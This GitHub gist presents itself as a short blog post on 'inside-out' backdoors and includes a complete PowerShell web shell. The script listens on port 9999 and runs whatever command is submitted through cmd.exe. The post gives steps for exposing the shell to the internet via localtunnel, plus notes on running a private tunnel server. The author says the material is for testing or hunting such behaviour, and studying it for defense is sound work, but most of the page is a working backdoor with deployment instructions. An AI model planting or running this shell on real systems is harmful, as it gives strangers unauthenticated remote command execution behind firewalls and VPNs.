Created
March 27, 2019 10:12
-
-
Save api0cradle/82d4369e51295c0465e43eb399303098 to your computer and use it in GitHub Desktop.
Gist Blog - Inside Out, Simple backdoors
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
From the inside out, a minimalist backdoor. | |
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN. | |
We will use in this example 3 tools. | |
1. Node | |
2. PowerShell | |
3. LocalTunnel | |
While I have a full compact, custom version, I will not release this. | |
This post is just to show you the concepts so you can test or hunt for this type of behavior. | |
If you want to customize this then do it yourself. For this example, I'm being intentionally noisy. | |
The idea is simple. | |
A host inside the target network, advertises a simple back door publicly. For this I will simply use a local web server on port 9999. You do not need to be admin to listen on high ports. You could easily leverage this to reroute or tunnel protocols like ssh or rdp. | |
Steps. | |
1. Download this gist to some windows host | |
2. Extract to some folder. | |
3. install nodeJS | |
4. start PowerWebShell.ps1 | |
5. npm install -g localtunnel | |
6. lt --port 9999 | |
localtunnel will emit a url that exposes the backdoor, simple browse to that. | |
example https://stranger-things-12.localtunnel.me/shell | |
You can then execute commands etc.. to demonstrate the effectiveness of an inside out tunnel. | |
Thats all | |
Cheers, | |
references: | |
https://localtunnel.github.io/www/ | |
https://nodejs.org/en/ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
example, setup linux server | |
point DNS at it. | |
install node | |
install localtunnel-server | |
`node -r esm ./bin/server` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Simple Web Shell over HTTP | |
#> | |
$Server = '127.0.0.1' #Listening IP. Change This. Or make it a parameter, I don't care ;-) | |
function Receive-Request { | |
param( | |
$Request | |
) | |
$output = "" | |
$size = $Request.ContentLength64 + 1 | |
$buffer = New-Object byte[] $size | |
do { | |
$count = $Request.InputStream.Read($buffer, 0, $size) | |
$output += $Request.ContentEncoding.GetString($buffer, 0, $count) | |
} until($count -lt $size) | |
$Request.InputStream.Close() | |
$cmd = $output.Split("=") | |
$OutputVariable = &{ cmd.exe /c $cmd[1].Split("+") | Out-String} | |
return $OutputVariable | |
} | |
$listener = New-Object System.Net.HttpListener | |
$listener.Prefixes.Add('http://127.0.0.1:9999/') | |
$listener.Start() | |
'Listening ...' | |
while ($true) { | |
$context = $listener.GetContext() # blocks until request is received | |
$request = $context.Request | |
$response = $context.Response | |
$hostip = $request.RemoteEndPoint | |
if ($request.Url -match '/shellPost$' -and ($request.HttpMethod -eq "POST") ) { | |
$message = Receive-Request($request); | |
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message) | |
$response.ContentLength64 = $buffer.length | |
$output = $response.OutputStream | |
$output.Write($buffer, 0, $buffer.length) | |
$output.Close() | |
continue | |
} | |
if ($request.Url -match '/shell$' -and ($request.HttpMethod -eq "GET")) { | |
$enc = [system.Text.Encoding]::UTF8 | |
$response.ContentType = 'text/html' | |
$shellcode = '<form action="/shellPost" method="POST" > | |
Command:<br> | |
<input type="text" name="Command" value="ipconfig.exe"><br> | |
<input type="submit" value="Submit"> | |
</form>' | |
$buffer = $enc.GetBytes($shellcode) | |
$response.ContentLength64 = $buffer.length | |
$output = $response.OutputStream | |
$output.Write($buffer, 0, $buffer.length) | |
$output.Close() | |
continue | |
} | |
$message = '<html><h1>It Works!</h1></html>' | |
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message) | |
$response.ContentLength64 = $buffer.length | |
$output = $response.OutputStream | |
$output.Write($buffer, 0, $buffer.length) | |
$output.Close() | |
} | |
$listener.Stop() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment